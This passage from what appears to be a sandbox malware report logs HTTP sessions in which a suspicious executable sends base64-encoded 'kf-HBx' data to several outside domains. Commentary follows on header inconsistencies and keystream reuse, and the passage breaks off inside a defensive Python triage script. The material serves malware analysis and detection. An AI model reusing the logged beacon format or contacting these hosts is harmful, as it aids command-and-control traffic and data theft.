    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
    Data Ascii: kf-HBx= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:33.122854948 CEST | 524 | OUT | GET /xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5 HTTP/1.1
    Host: www.softillery.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:03:33.751420021 CEST | 394 | IN | HTTP/1.1 200 OK
    Server: openresty
    Date: Thu, 24 Oct 2024 06:03:33 GMT
    Content-Type: text/html
    Content-Length: 254
    Connection: close
    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50036 | 156.226.22.233 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:47.209918976 CEST | 781 | OUT | POST /moqb/ HTTP/1.1
    Host: www.nad5.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.nad5.shop
    Referer: http://www.nad5.shop/moqb/
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
    Data Ascii: kf-HBx=0QcsiTwWh5kYgIfFRX0jJHHoeqNHElvQsWMlRQ3hhOy63ZbN881SJcBvOK2ftwoDXQyOIr9ELa04dkwZKX4S/kuAjR1s8Iht746V1k/K429vWbS7q8nSMLyTwBWhSwwJbLxpCesyZy9UU8ZSqLDURW5JiePbY/PdeXl1tY64nIWQrtGOXzuGa1pjvMNKGQJR0A==
Oct 24, 2024 08:03:48.209170103 CEST | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 24 Oct 2024 06:03:47 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50037 | 156.226.22.233 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:03:49.753036022 CEST | 801 | OUT | POST /moqb/ HTTP/1.1
    Host: www.nad5.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.nad5.shop
    Referer: http://www.nad5.shop/moqb/
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 223
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Ascii: kf-HBx=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9a629XN991SKcBvWa2WpwoMXQuGIudELaw4dhMZKm4dtkuCrx1uhYht746V1kqX4yRvWLi7odndFryQghWhFgwzbLwMCbEIZwFUU+xStaDXbW5Pt+OUZ6q3e3Ami6zet6iPnLXUGCPRI1NQyLE+LT0YvEH6/mOH6klt2oSbSl3u7XE=
Timestamp: Oct 24, 2024 08:03:50.707211018 CEST | Bytes transferred: 691 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:50 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 50038 | Destination IP: 156.226.22.233 | Destination Port: 80 | PID: 1376 | Process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:03:52.297502041 CEST | Bytes transferred: 10883 | Direction: OUT | Data:
POST /moqb/ HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.nad5.shop
                                                                                                                                  Referer: http://www.nad5.shop/moqb/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 30 51 63 73 69 54 77 57 68 35 6b 59 68 70 76 46 58 32 30 6a 42 48 48 72 52 4b 4e 48 4f 46 76 55 73 57 77 6c 52 53 62 49 67 39 43 36 32 4f 66 4e 38 65 4e 53 4c 63 42 76 49 4b 32 54 70 77 6f 72 58 51 6d 43 49 75 42 75 4c 59 34 34 48 45 41 5a 4d 56 67 64 33 30 75 43 6e 52 31 6a 38 49 68 43 37 35 57 52 31 6b 36 58 34 79 52 76 57 4e 75 37 68 73 6e 64 4a 4c 79 54 77 42 57 31 53 77 78 39 62 4b 55 36 43 62 41 59 65 41 6c 55 55 65 42 53 73 6f 72 58 54 57 35 4e 71 2b 50 4c 5a 36 75 73 65 33 63 71 69 37 47 37 74 35 2b 50 32 66 53 72 63 6a 6e 58 62 56 46 30 73 38 73 6b 45 42 51 2b 75 56 37 55 35 54 57 6b 75 67 6c 6e 2b 4b 4c 68 57 33 54 75 6c 51 34 33 36 36 55 59 5a 30 74 57 62 33 41 42 49 47 42 52 73 74 54 59 32 2b 65 64 71 41 32 4d 74 47 4a 45 53 44 70 50 4c 61 36 35 41 56 42 32 2f 44 52 70 57 47 78 38 4a 50 65 4f 63 6b 64 45 4f 58 44 5a 56 6e 35 47 77 6d 58 6b 38 56 6a 2b 31 2f 33 52 47 4f 30 41 47 59 46 78 2f 79 37 47 71 44 79 5a 6c 6d 76 58 69 57 69 2b 78 43 4a 46 6a 42 50 74 32 4d 69 [TRUNCATED]
Data Ascii: kf-HBx=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9C62OfN8eNSLcBvIK2TpworXQmCIuBuLY44HEAZMVgd30uCnR1j8IhC75WR1k6X4yRvWNu7hsndJLyTwBW1Swx9bKU6CbAYeAlUUeBSsorXTW5Nq+PLZ6use3cqi7G7t5+P2fSrcjnXbVF0s8skEBQ+uV7U5TWkugln+KLhW3TulQ4366UYZ0tWb3ABIGBRstTY2+edqA2MtGJESDpPLa65AVB2/DRpWGx8JPeOckdEOXDZVn5GwmXk8Vj+1/3RGO0AGYFx/y7GqDyZlmvXiWi+xCJFjBPt2Mi [TRUNCATED]
Timestamp: Oct 24, 2024 08:03:53.452917099 CEST | Bytes transferred: 691 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:53 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 50039 | Destination IP: 156.226.22.233 | Destination Port: 80 | PID: 1376 | Process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:03:54.845175982 CEST | Bytes transferred: 518 | Direction: OUT | Data:
GET /moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q= HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Oct 24, 2024 08:03:55.799308062 CEST | Bytes transferred: 691 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 50040 | Destination IP: 52.20.84.62 | Destination Port: 80 | PID: 1376 | Process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:04:01.215353966 CEST | Bytes transferred: 781 | Direction: OUT | Data:
POST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 65 42 71 2b 33 52 2b 6d 48 6c 63 4c 37 56 59 47 50 52 74 54 71 79 2b 49 4b 7a 7a 36 31 32 71 45 4a 55 68 56 4a 49 4e 6e 6e 77 37 47 41 6c 70 4d 4d 62 54 31 59 75 54 59 42 68 42 77 39 68 72 49 6a 50 41 79 35 46 50 4a 2f 6e 53 6b 54 4d 6f 6a 63 5a 38 6e 4b 53 66 6e 59 68 63 35 69 42 74 36 6a 33 4f 69 61 6d 35 69 6f 47 75 51 2b 42 38 46 51 53 7a 45 2f 36 39 50 52 45 52 45 76 77 68 62 6a 6d 65 34 38 77 6a 4c 57 76 76 7a 32 52 6e 50 50 46 37 6e 37 68 33 44 50 62 59 50 6c 32 42 41 47 38 35 46 75 37 47 4b 32 38 33 55 34 70 58 49 61 4c 43 6d 4d 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=rXgWPg4TpnazeBq+3R+mHlcL7VYGPRtTqy+IKzz612qEJUhVJINnnw7GAlpMMbT1YuTYBhBw9hrIjPAy5FPJ/nSkTMojcZ8nKSfnYhc5iBt6j3Oiam5ioGuQ+B8FQSzE/69PREREvwhbjme48wjLWvvz2RnPPF7n7h3DPbYPl2BAG85Fu7GK283U4pXIaLCmMg==
Timestamp: Oct 24, 2024 08:04:01.869029999 CEST | Bytes transferred: 705 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:01 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 50041 | Destination IP: 52.20.84.62 | Destination Port: 80 | PID: 1376 | Process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:04:03.767206907 CEST | Bytes transferred: 801 | Direction: OUT | Data:
POST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 79 45 4b 30 78 56 49 4a 4e 6e 67 77 37 47 50 46 70 44 44 37 54 71 59 75 65 6e 42 67 39 77 39 69 58 49 6a 4f 77 79 35 79 62 49 6c 58 53 63 4b 63 6f 74 59 5a 38 6e 4b 53 66 6e 59 68 68 63 69 43 64 36 69 48 2b 69 4c 33 35 6c 67 6d 75 54 37 42 38 46 42 43 7a 2b 2f 36 38 61 52 48 55 68 76 7a 4a 62 6a 6e 75 34 39 6c 50 49 63 76 75 34 6f 52 6d 6b 47 6b 69 37 68 53 47 51 4e 4a 45 4b 67 46 78 78 48 36 6f 66 2f 4b 6e 64 6b 38 54 6e 6c 75 65 38 58 49 2f 76 58 6c 58 72 68 65 4b 32 2f 4f 43 59 4e 6c 79 64 38 36 4e 62 5a 62 45 3d
                                                                                                                                  Data Ascii: kf-HBx=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1AyEK0xVIJNngw7GPFpDD7TqYuenBg9w9iXIjOwy5ybIlXScKcotYZ8nKSfnYhhciCd6iH+iL35lgmuT7B8FBCz+/68aRHUhvzJbjnu49lPIcvu4oRmkGki7hSGQNJEKgFxxH6of/Kndk8Tnlue8XI/vXlXrheK2/OCYNlyd86NbZbE=
Timestamp: Oct 24, 2024 08:04:04.407469034 CEST | Bytes transferred: 705 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

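Sessions 30 to 34 above are one exchange repeated against two hosts: a POST of a single form field (kf-HBx) carrying base64 text, a second POST of the same shape with a 10303-byte body, then a GET with the same field moved into the query string, each answered by a stock nginx or openresty 404/405 page. Two things in the requests are worth checking by hand. First, the User-Agent claims Internet Explorer 8 on Windows 7 while Accept advertises image/avif and image/webp and Accept-Encoding advertises br; that browser never supported any of the three, so the header set is a fixed template rather than a real client. Second, the base64 bodies sent to the same host agree character for character at the same offsets (sessions 33 and 34 share their first 12 characters and the run Z8nKSfnYh starting at character 93), which is the pattern left when two messages with a common header are encrypted under the same keystream and then base64-encoded. The report itself does not say how the payload is encrypted, so the script below only measures that agreement and recovers nothing. It is an added example written for this page, not code from the Joe Sandbox report or from the sample: the kf-HBx values are copied verbatim from sessions 30, 32, 33 and 34 (the 10 KB bodies of sessions 31 and 35 are truncated in the report and left out), the header block is reassembled from the headers those sessions show, and the Chrome request is a constructed negative control. Run it to get a one-line triage per request plus the byte offsets at which the two www.luxe.guru payloads coincide.

```python
# Added example for this report (not Joe Sandbox or sample code): parse the captured
# requests, flag the inconsistent browser headers, and measure where two payloads to
# the same host agree byte for byte. Nothing is sent and no key is recovered.
import base64
import os
from urllib.parse import urlsplit

# Header values every request in sessions 30-35 carries, copied from the report.
ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
IE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
          ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; "
          "InfoPath.3; .NET4.0C; .NET4.0E)")
# kf-HBx values verbatim from the Data Ascii lines of sessions 30, 32, 33 and 34.
B64_30 = "0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9a629XN991SKcBvWa2WpwoMXQuGIudELaw4dhMZKm4dtkuCrx1uhYht746V1kqX4yRvWLi7odndFryQghWhFgwzbLwMCbEIZwFUU+xStaDXbW5Pt+OUZ6q3e3Ami6zet6iPnLXUGCPRI1NQyLE+LT0YvEH6/mOH6klt2oSbSl3u7XE="
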